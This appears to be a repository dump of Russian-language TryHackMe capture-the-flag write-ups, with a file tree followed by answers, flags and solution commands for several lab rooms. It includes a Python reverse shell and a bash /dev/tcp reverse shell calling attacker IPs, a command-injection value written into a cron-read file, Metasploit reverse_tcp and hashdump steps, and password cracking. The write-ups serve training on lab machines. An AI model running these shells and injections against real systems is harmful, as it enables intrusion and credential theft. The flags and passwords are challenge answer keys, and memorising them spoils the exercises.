├── 00.info ├── Advent of Cyber '23 Side Quest.md ├── Baron Samedit.md ├── Burp Suite Repeater.md ├── Bypass Disable Functions.md ├── CVE-2021-41773 42013.md ├── Careers in Cyber.md ├── Dirty Pipe CVE-2022-0847.md ├── History of Malware.md ├── Intro to IR and IM.md ├── Learn & win prizes - Fall 2022.md ├── Learn and win prizes #2.md ├── Learn and win prizes.md ├── Linux Fundamentals Part 1.md ├── OverlayFS - CVE-2021-3493.md ├── Polkit CVE-2021-3560.md ├── Pwnkit CVE-2021-4034.md ├── REmux The Tmux.md ├── Security Awareness.md ├── Spring4Shell CVE-2022-22965.md ├── Sudo Buffer Overflow.md ├── Sudo Security Bypass.md ├── TryWinMe Think Cyber Monopoly.md ├── What is Networking.md ├── Win Prizes and Learn - 2023!.md ├── Windows Fundamentals 1.md ├── Windows Fundamentals 2.md ├── Windows Fundamentals 3.md └── clean.md ├── 01.easy ├── 0x41haz.md ├── 25 Days of Cyber Security.md ├── Active Directory Basics.md ├── Active Reconnaissance.md ├── Advent of Cyber 1 [2019].md ├── Advent of Cyber 2 [2020].md ├── Advent of Cyber 2022.md ├── Advent of Cyber 2023.md ├── Advent of Cyber 2024.md ├── Advent of Cyber 3 (2021).md ├── Agent Sudo.md ├── Agent T.md ├── All in One.md ├── Anonforce.md ├── Anthem.md ├── Archangel.md ├── Atlassian CVE-2022-26134.md ├── AttackerKB.md ├── Attacking ICS Plant #1.md ├── Badbyte.md ├── Bash Scripting.md ├── Basic Pentesting.md ├── Become a Hacker.md ├── Blaster.md ├── Blue.md ├── Blueprint.md ├── Bolt.md ├── Bounty Hacker.md ├── Break Out The Cage.md ├── Brooklyn Nine Nine.md ├── Brute Force Heroes.md ├── Brute It.md ├── Buffer Overflow Prep.md ├── Bugged.md ├── CTF collection Vol1 │ ├── CTF collection Vol.1.md │ ├── base-decoder.sh │ ├── rot1_25-bruteforce.py │ └── xor-strings.py ├── CTF collection Vol2 │ ├── CTF collection Vol.2.md │ ├── answer.sh │ └── bpython.py ├── Capture!.md ├── Cat Pictures 2.md ├── Cat Pictures.md ├── Chill Hack.md ├── Chocolate Factory.md ├── ColddBox Easy.md ├── Compiled.md ├── Confluence CVE-2023-22515.md ├── Corridor.md ├── Couch.md ├── Crack the hash.md ├── Creative.md ├── Cryptography Basics.md ├── Cryptography for Dummies.md ├── Cyber Kill Chain.md ├── CyberChef The Basics.md ├── CyberLens.md ├── Cyborg.md ├── DFIR An Introduction.md ├── DNS Manipulation.md ├── DNS in detail.md ├── DVWA.md ├── Dav.md ├── Dear QA.md ├── Defensive Security Intro.md ├── Digital Forensics Case B4DM755.md ├── Dreaming.md ├── Easy Peasy.md ├── Empire.md ├── Enumeration & Brute Force.md ├── Eviction.md ├── Flatline.md ├── Flip.md ├── Fowsniff CTF.md ├── GLITCH.md ├── Gallery.md ├── GamingServer.md ├── Geolocating Images.md ├── Getting Started.md ├── Git Happens.md ├── Google Dorking.md ├── Gotta Catch'em All!.md ├── Governance & Regulation.md ├── HTTP Request Smuggling.md ├── HTTP in Detail.md ├── Hacker vs. Hacker.md ├── Hijack.md ├── How Websites Work.md ├── How to use TryHackMe.md ├── Hydra.md ├── IDE.md ├── IR Philosophy and Ethics.md ├── ISO27001.md ├── Identity and Access Management.md ├── Ignite.md ├── Insekube.md ├── Intro PoC Scripting.md ├── Intro To Pwntools.md ├── Intro to Containerisation.md ├── Intro to Cyber Threat Intel.md ├── Intro to Defensive Security.md ├── Intro to Detection Engineering.md ├── Intro to Digital Forensics.md ├── Intro to Docker.md ├── Intro to Endpoint Security.md ├── Intro to IR and IM.md ├── Intro to IaC.md ├── Intro to Log Analysis.md ├── Intro to Logs.md ├── Intro to Offensive Security.md ├── Intro to Pipeline Automation.md ├── Introduction to Antivirus.md ├── Introduction to Django.md ├── Introduction to OWASP ZAP.md ├── Introduction to SIEM.md ├── Introduction to Windows API.md ├── Introductory Researching.md ├── Investigating Windows.md ├── JPGChat.md ├── Jack-of-All-Trades.md ├── JavaScript Basics.md ├── Jax sucks alot..............md ├── Juicy Details.md ├── Junior Security Analyst Intro.md ├── Jupyter 101.md ├── Kenobi.md ├── KoTH Food CTF.md ├── L2 MAC Flooding & ARP Spoofing.md ├── LazyAdmin.md ├── Learning Cyber Security.md ├── Lesson Learned.md ├── Lian_Yu.md ├── Library.md ├── Linux Backdoors.md ├── Linux File System Analysis.md ├── Linux Modules.md ├── Linux Strength Training.md ├── Log Operations.md ├── MAL Malware Introductory.md ├── MAL_Researching.md ├── MD2PDF.md ├── Madness │ ├── Madness.md │ └── secret.py ├── Memory Forensics.md ├── Metasploit Introduction.md ├── Microservices Architectures.md ├── Moniker Link (CVE-2024-21413).md ├── Mustacchio.md ├── Nessus.md ├── Network Services 2.md ├── Network Services.md ├── Networking Concepts.md ├── Ninja Skills.md ├── Nmap.md ├── OWASP Broken Access Control.md ├── OWASP Juice Shop.md ├── OWASP Top 10 - 2021.md ├── OWASP Top 10.md ├── Offensive Security Intro.md ├── OhSINT.md ├── Opacity.md ├── OpenVAS.md ├── OpenVPN.md ├── Outlook NTLM Leak.md ├── Overpass 2 - Hacked.md ├── Overpass.md ├── ParrotPost Phishing Analysis.md ├── Passive Reconnaissance.md ├── Pentesting Fundamentals.md ├── Phishing Analysis Fundamentals.md ├── Phishing Emails in Action.md ├── Physical Security Intro.md ├── Pickle Rick.md ├── Plotted-TMS.md ├── Post-Exploitation Basics.md ├── Poster.md ├── Printer Hacking 101.md ├── Psycho Break.md ├── Publisher.md ├── Publisher │ ├── Publisher.md │ ├── exploit.py │ ├── requirements.txt │ └── reverse.sh ├── Putting it all together.md ├── Pyramid Of Pain.md ├── Python Basics.md ├── Red Team Engagements.md ├── Red Team Fundamentals.md ├── Red.md ├── Registry Persistence Detection.md ├── Reversing ELF.md ├── RootMe.md ├── RustScan.md ├── SDLC.md ├── SOC Fundamentals.md ├── SQL Injection Lab.md ├── SQLMAP.md ├── Sakura Room.md ├── Search Skills.md ├── Searchlight - IMINT.md ├── Security Engineer Intro.md ├── Security Principles.md ├── Servidae Log Analysis in ELK.md ├── Shodan.io.md ├── Simple CTF │ ├── Simple CTF.md │ └── exploit.py ├── Smag Grotto.md ├── Snyk_Open_Source.md ├── Source.md ├── Starting Out In Cyber Sec.md ├── Startup.md ├── TakeOver.md ├── Team.md ├── Tech_Supp0rt 1.md ├── The Cod Caper.md ├── The Hacker Methodology.md ├── Thompson.md ├── Threat Hunting Introduction.md ├── Threat Intelligence Tools.md ├── Tony the Tiger.md ├── Toolbox Vim.md ├── Tor.md ├── Traffic Analysis Essentials.md ├── TryHack3M Bricks Heist.md ├── Tutorial.md ├── Unified Kill Chain.md ├── Valley.md ├── VulnNet Internal.md ├── VulnNet Node.md ├── VulnNet Roasted.md ├── Vulnerabilities 101.md ├── Vulnversity.md ├── W1seGuy.md ├── Web Application Basics.md ├── Web Application Security.md ├── WebOSINT.md ├── Welcome.md ├── Wgel CTF.md ├── Wifi Hacking 101.md ├── Windows Command Line.md ├── Windows Incident Surface.md ├── Windows Incident Surface │ └── Windows Incident Surface.md ├── Wordpress CVE-2021-29447.md ├── XSS.md ├── Year of the Rabbit.md ├── b3dr0ck.md ├── c4ptur3-th3-fl4g.md ├── ffuf.md ├── h4cked.md ├── kiba.md ├── magician.md ├── tmux.md ├── tomghost.md └── x86 Architecture Overview.md ├── 02.Medium ├── 0day.md ├── AD Certificate Templates.md ├── Active Directory Hardening.md ├── Advanced SQL Injection.md ├── Android Hacking 101.md ├── Anonymous.md ├── Attacktive Directory.md ├── Basic Malware RE.md ├── Binary Heaven.md ├── Biohazard.md ├── Blog.md ├── Boiler CTF.md ├── Bookstore.md ├── Bypassing UAC.md ├── CMSpit.md ├── CMesS.md ├── CTF collection Vol.2.md ├── Carnage.md ├── Cicada-3301 Vol1.md ├── Classic Passwd.md ├── Cluster Hardening.md ├── ConvertMyVideo.md ├── Crack The Hash Level 2.md ├── CyberCrafted.md ├── Disk Analysis & Autopsy.md ├── Dissecting PE Headers.md ├── Dumping Router Firmware.md ├── Empline │ └── Empline.md ├── Encryption - Crypto 101.md ├── Frank & Herby make an app.md ├── Gatekeeper.md ├── GoldenEye.md ├── HA Joker CTF.md ├── HaskHell.md ├── Hip Flask.md ├── Introduction To Honeypots.md ├── Introduction to Cryptography.md ├── Introduction to DevSecOps.md ├── Intrusion Detection.md ├── Investigating Windows 2.0.md ├── K8s Best Security Practices.md ├── K8s Runtime Security.md ├── KAPE.md ├── KaffeeSec - SoMeSINT.md ├── Kubernetes for Everyone.md ├── Linux Agency.md ├── Linux Function Hooking.md ├── Linux PrivEsc Arena.md ├── Linux PrivEsc.md ├── Linux Privilege Escalation.md ├── Linux Server Forensics.md ├── Looking Glass.md ├── Masterminds.md ├── Mindgames.md ├── Mr Robot CTF.md ├── NahamStore.md ├── Nax.md ├── Nmap Live Host Discovery.md ├── Oh My WebServer.md ├── Ollie.md ├── Olympus.md ├── Overpass 3 - Hosting.md ├── PWN101 │ ├── PWN101.md │ ├── fuzz_pwn107.py │ ├── fuzz_pwn108.py │ ├── pwn101.c │ ├── pwn101.py │ ├── pwn102.c │ ├── pwn102.py │ ├── pwn103.c │ ├── pwn103.py │ ├── pwn104.c │ ├── pwn104.py │ ├── pwn105.c │ ├── pwn105.py │ ├── pwn106.c │ ├── pwn106.py │ ├── pwn107.c │ ├── pwn107.py │ ├── pwn107_local.py │ ├── pwn108.c │ ├── pwn108.py │ ├── pwn109.c │ ├── pwn109.py │ ├── pwn109_local.py │ ├── pwn110.c │ └── pwn110.py ├── PaperCut CVE-2023-27350.md ├── Peak Hill.md ├── Preparation.md ├── PrintNightmare.md ├── Profiles.md ├── Recovery.md ├── Red Team OPSEC.md ├── Red Team Threat Intel.md ├── Redline.md ├── Regular expressions.md ├── Relevant.md ├── Road.md ├── SQHell.md ├── SQL Injection.md ├── SSDLC.md ├── SSRF.md ├── SSTI.md ├── Secure Network Architecture.md ├── Snort.md ├── Solar, exploiting log4j.md ├── Splunk Exploring SPL.md ├── TShark.md ├── The Great Escape.md ├── The Marketplace.md ├── The Server From Hell.md ├── Threat Intelligence for SOC.md ├── Tokyo Ghoul.md ├── UltraTech.md ├── VulnNet.md ├── Watcher.md ├── Wazuh.md ├── Wekor.md ├── Windows Forensics 1.md ├── Windows PrivEsc Arena.md ├── Windows PrivEsc.md ├── Windows Reversing Intro.md ├── Windows x64 Assembly.md ├── Wonderland.md ├── Zeno.md ├── battery.md ├── biteme.md ├── dogcat.md └── hackerNote.md ├── LICENSE ├── README.md └── art ├── top1.png └── tryhackme.jpeg /00.info/clean.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната []() 4 | 5 | Всего 5 заданий: 6 | ## Задание 1 7 | 8 | ```commandline 9 | Ответ не нужен 10 | ``` 11 | 12 | ## Задание 2 13 | 14 | ```commandline 15 | Ответ не нужен 16 | ``` 17 | 18 | ## Задание 3 19 | 20 | ```commandline 21 | Ответ не нужен 22 | ``` 23 | 24 | ## Задание 4 25 | 26 | ```commandline 27 | Ответ не нужен 28 | ``` 29 | 30 | ## Задание 5 31 | 32 | ```commandline 33 | Ответ не нужен 34 | ``` 35 | 36 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/0x41haz.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [0x41haz](https://tryhackme.com/r/room/0x41haz) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | В этом задании вам предлагается решить простое обратное решение. Загрузите и проанализируйте двоичный файл, чтобы узнать пароль. 8 | 9 | Могут быть приняты меры по предотвращению обратного движения! 10 | 11 | ### Ответьте на вопросы ниже 12 | Какой пароль? 13 | ```commandline 14 | THM{2@@25$gfsT&@L} 15 | ``` 16 | 17 | 18 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Agent Sudo.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Agent Sudo](https://tryhackme.com/r/room/agentsudoctf) 4 | 5 | Всего 5 заданий: 6 | ## Задание 1 7 | Добро пожаловать в еще одну эксклюзивную комнату CTF от THM . Ваша задача проста: захватите флаги, как и в другой 8 | комнате CTF. Развлекайтесь! 9 | 10 | Если вы застряли в черной дыре, напишите на форуме или спросите в TryHackMe discord. 11 | 12 | ### Ответить на вопросы ниже 13 | Разверните машину 14 | ```commandline 15 | Ответ не нужен 16 | ``` 17 | 18 | ## Задание 2 19 | Пронумеруйте машину и получите всю важную информацию 20 | 21 | ### Ответить на вопросы ниже 22 | Сколько открытых портов? 23 | ```commandline 24 | 3 25 | ``` 26 | Как перенаправить себя на секретную страницу? 27 | ```commandline 28 | user-agent 29 | ``` 30 | Как зовут агента? 31 | ```commandline 32 | chris 33 | ``` 34 | 35 | ## Задание 3 36 | Закончили перечислять машины? Пришло время проложить себе путь к свободе. 37 | 38 | ### Ответить на вопросы ниже 39 | FTP-пароль 40 | ```commandline 41 | crystal 42 | ``` 43 | Пароль к zip-файлу 44 | ```commandline 45 | alien 46 | ``` 47 | пароль steg 48 | ```commandline 49 | Area51 50 | ``` 51 | Кто этот другой агент (полное имя)? 52 | ```commandline 53 | james 54 | ``` 55 | SSH-пароль 56 | ```commandline 57 | hackerrules! 58 | ``` 59 | 60 | ## Задание 4 61 | Вы знаете, что делать. 62 | 63 | ### Ответить на вопросы ниже 64 | Что такое флаг пользователя? 65 | ```commandline 66 | b03d975e8c92a7c04146cfa7a5a313c7 67 | ``` 68 | Как называется инцидент, запечатленный на фотографии? 69 | ```commandline 70 | Roswell alien autopsy 71 | ``` 72 | 73 | ## Задание 5 74 | Хватит экстраординарных вещей? Пора стать реалистами. 75 | 76 | ### Ответить на вопросы ниже 77 | Номер CVE для эскалации 78 | (Формат: CVE-xxxx-xxxx) 79 | ```commandline 80 | CVE-2019-14287 81 | ``` 82 | Что такое корневой флаг? 83 | ```commandline 84 | b53a02f55b57d4439e3341834d70c062 85 | ``` 86 | (Бонус) Кто такой агент R? 87 | ```commandline 88 | DesKel 89 | ``` 90 | 91 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Agent T.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Agent T](https://tryhackme.com/r/room/agentt) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Агент Т обнаружил этот веб-сайт, который выглядит вполне невинно, но что-то не так с реакцией сервера... 8 | 9 | После развертывания уязвимой машины, подключенной к этой задаче, подождите пару минут, пока она ответит. 10 | 11 | ### Ответьте на вопросы ниже 12 | Что такое флаг? 13 | ```commandline 14 | nmap -Pn -sC -sV -A -T4 -p- 15 | # https://www.exploit-db.com/exploits/49933 16 | python exploit.py 17 | 18 | whoami 19 | cat /flag.txt 20 | ``` 21 | ```commandline 22 | flag{4127d0530abf16d6d23973e3df8dbecb} 23 | ``` 24 | 25 | 26 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/All in One.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [All in One](https://tryhackme.com/r/room/allinonemj) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Цель этого ящика — помочь вам попрактиковаться в нескольких способах эксплуатации системы. Существует несколько 8 | преднамеренных путей для ее эксплуатации и несколько непреднамеренных путей для получения root-доступа. 9 | 10 | Попробуйте обнаружить и использовать их все. Не просто используйте его, используя предполагаемые пути, взламывайте 11 | как профессионал и наслаждайтесь коробкой! 12 | 13 | Дайте машине около 5 минут для полной загрузки. 14 | 15 | Твиттер: i7m4d 16 | 17 | ### Ответьте на вопросы ниже 18 | пользователь.txt 19 | ```commandline 20 | nmap -sC -sV 21 | gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 22 | curl http:///hackathons 23 | # Encrypted string: Dvc W@iyur@123 24 | # Key: KeepGoing 25 | # Decrypted string: Try H@ckme@123 26 | 27 | wpscan --url http:///wordpress/ -e u 28 | elyana:H@ckme@123 29 | # http:///wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty 30 | # PHP reverse shell 31 | nc -nlvp 4444 32 | python3 -c "import pty;pty.spawn('/bin/bash')" 33 | find / -user elyana -type f 2>/dev/null 34 | cat /etc/mysql/conf.d/private.txt 35 | # user: elyana 36 | # password: E@syR18ght 37 | sshpass -p "E@syR18ght" ssh elyana@ 38 | cat user.txt 39 | echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d 40 | ``` 41 | ```commandline 42 | THM{49jg666alb5e76shrusn49jg666alb5e76shrusn} 43 | ``` 44 | корень.txt 45 | ```commandline 46 | cat /etc/crontab 47 | vim /var/backups/script.sh 48 | 49 | #!/bin/bash 50 | python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 51 | nc -nlvp 4444 52 | cat /root/root.txt | base64 -d 53 | ``` 54 | ```commandline 55 | THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8} 56 | ``` 57 | 58 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Anonforce.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Anonforce]() 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Прочитать user.txt и root.txt 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sC -sV 13 | ftp 14 | cd home/melodias 15 | get user.txt 16 | cat user.txt 17 | ``` 18 | ```commandline 19 | 606083fd33beb1284fc51f411a706af8 20 | ``` 21 | корень.txt 22 | ```commandline 23 | ls /notread 24 | gpg --import private.asc 25 | /data/src/john/run/gpg2john private.asc > pgp.hash 26 | john pgp.hash --wordlist=/data/src/wordlists/rockyou.txt 27 | # xbox360 (anonforce) 28 | gpg --import private.asc 29 | gpg --decrypt backup.pgp 30 | john backup --wordlist=/data/src/wordlists/rockyou.txt 31 | root: hikari 32 | ssh root@ 33 | cat root.txt 34 | ``` 35 | ```commandline 36 | f706456440c7af4187810c31c6cebdce 37 | ``` 38 | 39 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Basic Pentesting.md: -------------------------------------------------------------------------------- 1 | 2 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 3 | 4 | # Комната [Basic Pentesting](https://tryhackme.com/r/room/basicpentestingjt) 5 | 6 | Всего 1 задание: 7 | ## Задание 1 8 | В этом наборе заданий вы узнаете следующее: 9 | - грубая сила 10 | - взлом хэша 11 | - перечисление услуг 12 | - Перечисление Linux 13 | Главная цель здесь — узнать как можно больше. Убедитесь, что вы подключены к нашей сети с помощью вашего файла конфигурации OpenVPN. 14 | 15 | Благодарим Джозайю Пирса из Vulnhub. 16 | 17 | ### Ответить на вопросы ниже 18 | Разверните машину и подключите ее к нашей сети. 19 | ```commandline 20 | Ответ не нужен 21 | ``` 22 | Найдите услуги, предоставляемые машиной 23 | ```commandline 24 | Ответ не нужен 25 | ``` 26 | Каково имя скрытого каталога на веб-сервере (введите имя без /)? 27 | ```commandline 28 | development 29 | ``` 30 | Брутфорс пользователя для поиска имени пользователя и пароля 31 | ```commandline 32 | Ответ не нужен 33 | ``` 34 | Какое имя пользователя? 35 | ```commandline 36 | jan 37 | ``` 38 | Какой пароль? 39 | ```commandline 40 | armando 41 | ``` 42 | Какой сервис вы используете для доступа к серверу (ответьте сокращенно заглавными буквами)? 43 | ```commandline 44 | SSH 45 | ``` 46 | Перечислите машины, чтобы найти любые векторы для повышения привилегий. 47 | ```commandline 48 | Ответ не нужен 49 | ``` 50 | Каково имя другого пользователя, которого вы нашли (все строчные буквы)? 51 | ```commandline 52 | kay 53 | ``` 54 | Если вы нашли другого пользователя, что вы можете сделать с этой информацией? 55 | ```commandline 56 | Ответ не нужен 57 | ``` 58 | Какой окончательный пароль вы получите? 59 | ```commandline 60 | heresareallystrongpasswordthatfollowsthepasswordpolicy$$ 61 | ``` 62 | 63 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Blueprint.md: -------------------------------------------------------------------------------- 1 | Blueprint 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната []() 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Хватит ли у вас сил взломать эту машину с Windows? 10 | 11 | It might take around 3-4 minutes for the machine to boot. 12 | 13 | ### Ответьте на вопросы ниже 14 | Расшифрован хэш NTLM пользователя "Lab" 15 | ```commandline 16 | sudo nmap -sS -sV -sC -Pn 17 | gobuster dir -u http:// - w /usr/share/wordlists/dirb/big.txt 18 | nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 19 | http:// 20 | http://:8080 21 | searchsploit oscommerce 2.3.4 22 | ./searchsploit -m 44374 23 | msfconsole -q 24 | use multi/handler 25 | set payload windows/shell/reverse_tcp 26 | set lhost 27 | run 28 | python exploit.py 29 | whoami 30 | nt authority\system 31 | sessions 32 | sessions -u 1 33 | sessions 34 | sessions 2 35 | getuid 36 | hashdump 37 | ``` 38 | ```commandline 39 | googleplus 40 | ``` 41 | корень.txt 42 | ```commandline 43 | cd /users/administrator/desktop 44 | ls 45 | cat root.txt.txt 46 | ``` 47 | ```commandline 48 | THM{aea1e3ce6fe7f89e10cea833ae009bee} 49 | ``` 50 | 51 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Bolt.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Bolt](https://tryhackme.com/r/room/bolt) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Эта комната предназначена для пользователей, чтобы ознакомиться с Bolt CMS и тем, как ее можно эксплуатировать с 8 | помощью Authenticated Remote Code Execution. Вам следует подождать не менее 3-4 минут, чтобы машина запустилась 9 | должным образом. 10 | 11 | Если у вас есть какие-либо вопросы или отзывы, вы можете связаться со мной через сервер TryHackMe Discord или через 12 | Twitter. 13 | 14 | ### Ответьте на вопросы ниже 15 | Запустите машину 16 | 17 | ```commandline 18 | Ответ не нужен 19 | ``` 20 | ## Задание 2 21 | #### Герой освобожден 22 | 23 | После успешного развертывания виртуальной машины проведите ее перебор, прежде чем искать флаг на машине. 24 | 25 | ### Ответьте на вопросы ниже 26 | Какой номер порта имеет веб-сервер с работающей CMS? 27 | ```commandline 28 | nmap 29 | ``` 30 | ```commandline 31 | 8000 32 | ``` 33 | Какое имя пользователя мы можем найти в CMS? 34 | ```commandline 35 | http://:8000 36 | ``` 37 | ```commandline 38 | bolt 39 | ``` 40 | Какой пароль мы можем найти для этого имени пользователя? 41 | ```commandline 42 | boltadmin123 43 | ``` 44 | Какая версия CMS установлена на сервере? (Пример: Название 1.1.1) 45 | ```commandline 46 | http://:8000/bolt/login 47 | # bolt:boltadmin123 48 | ``` 49 | ```commandline 50 | Bolt 3.7.1 51 | ``` 52 | Есть эксплойт для предыдущей версии этой CMS, который позволяет аутентифицированный RCE. Найдите его на Exploit DB. Какой у него EDB-ID? 53 | ```commandline 54 | 48296 55 | ``` 56 | Metasploit недавно добавил модуль эксплойта для этой уязвимости. Каков полный путь для этого эксплойта? (Например: explore/....) 57 | 58 | Примечание: Если вы не можете найти модуль эксплойта, скорее всего, ваш metasploit не обновлен. Запустите ` apt 59 | update `, затем ` apt install metasploit-framework ` 60 | 61 | ```commandline 62 | apt update 63 | apt install metasploit-framework 64 | msfconsole 65 | search bolt 66 | use exploit/unix/webapp/bolt_authenticated_rce 67 | set RHOSTS 68 | set LHOST 69 | set USERNAME bolt 70 | set PASSWORD boltadmin123 71 | set TARGETURI http://:8000/ 72 | exploit 73 | ``` 74 | ```commandline 75 | exploit/unix/webapp/bolt_authenticated_rce 76 | ``` 77 | Установите LHOST, LPORT, RHOST, USERNAME, PASSWORD в msfconsole перед запуском эксплойта 78 | ```commandline 79 | Ответ не нужен 80 | ``` 81 | Найдите flag.txt внутри машины. 82 | ```commandline 83 | whoami 84 | cd /home 85 | ls -al 86 | cat flag.txt 87 | ``` 88 | ```commandline 89 | THM{wh0_d035nt_l0ve5_b0l7_r1gh7?} 90 | ``` 91 | 92 | 93 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Bounty Hacker.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Bounty Hacker](https://tryhackme.com/r/room/cowboyhacker) 4 | 5 | Всего 1 задание: 6 | ## Задание 1 7 | Ты хвастался и хвастался своими элитными навыками хакера в баре, и несколько охотников за головами решили, что они 8 | возьмут тебя на заметку! Докажи, что твой статус — это больше, чем просто несколько стаканов в баре. Я чувствую, что 9 | в твоем будущем будут болгарский перец и говядина! 10 | 11 | ### Ответить на вопросы ниже 12 | Разверните машину. 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | Найдите открытые порты на машине 17 | ```commandline 18 | Ответ не нужен 19 | ``` 20 | Кто составил список задач? 21 | ```commandline 22 | lin 23 | ``` 24 | Какой сервис можно взломать с помощью найденного текстового файла? 25 | ```commandline 26 | SSH 27 | ``` 28 | Какой пароль у пользователя? 29 | ```commandline 30 | RedDr4gonSynd1cat3 31 | ``` 32 | пользователь.txt 33 | ```commandline 34 | THM{CR1M3_SyNd1C4T3} 35 | ``` 36 | корень.txt 37 | ```commandline 38 | THM{80UN7Y_h4cK3r} 39 | ``` 40 | 41 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Break Out The Cage.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [Break Out The Cage](https://tryhackme.com/r/room/breakoutthecage1) 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Давайте узнаем, чем занимается его агент... 10 | 11 | ### Ответьте на вопросы ниже 12 | Какой пароль у Уэстона? 13 | ```commandline 14 | nmap -sC -sV 15 | ftp 16 | ls -la 17 | get dad_tasks 18 | cat dad_tasks | base64 -d 19 | ``` 20 | ```commandline 21 | Mydadisghostrideraintthatcoolnocausehesonfirejokes 22 | ``` 23 | Что такое флаг пользователя? 24 | ```commandline 25 | ssh weston@ 26 | weston:Mydadisghostrideraintthatcoolnocausehesonfirejokes 27 | sudo -l 28 | ls -l /usr/bin/bees 29 | sudo /usr/bin/bees 30 | find / -type f -user cage 2>/dev/null 31 | cat /opt/.dads_scripts/spread_the_quotes.py 32 | cat /opt/.dads_scripts/.files/.quotes 33 | nc -nlvp 4444 34 | 35 | cat > /tmp/shell.sh << EOF 36 | #!/bin/bash 37 | bash -i >& /dev/tcp/10.9.0.54/4444 0>&1 38 | EOF 39 | 40 | chmod +x /tmp/shell.sh 41 | printf 'anything;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/.quotes 42 | cat Super_Duper_Checklist 43 | ``` 44 | ```commandline 45 | THM{M37AL_0R_P3N_T35T1NG} 46 | ``` 47 | Что такое корневой флаг? 48 | ```commandline 49 | cat email_backup/* 50 | su root 51 | Password: cageisnotalegend 52 | ls -la 53 | cd email_backup 54 | cat email_1 55 | ``` 56 | ```commandline 57 | THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3} 58 | ``` 59 | 60 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Bugged.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Bugged](https://tryhackme.com/r/room/bugged) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Джон работал над своими умными бытовыми приборами, когда заметил странный трафик, проходящий по сети. Можете ли вы 8 | помочь ему выяснить, что это за странные сетевые коммуникации? 9 | 10 | Примечание: полная загрузка машины может занять от 3 до 5 минут. 11 | ### Ответьте на вопросы ниже 12 | Что такое флаг? 13 | ```commandline 14 | sudo nmap -sV -sC 15 | sudo apt-get install mosquitto mosquitto-clients -y 16 | mosquitto_sub -t "#" -h 17 | echo 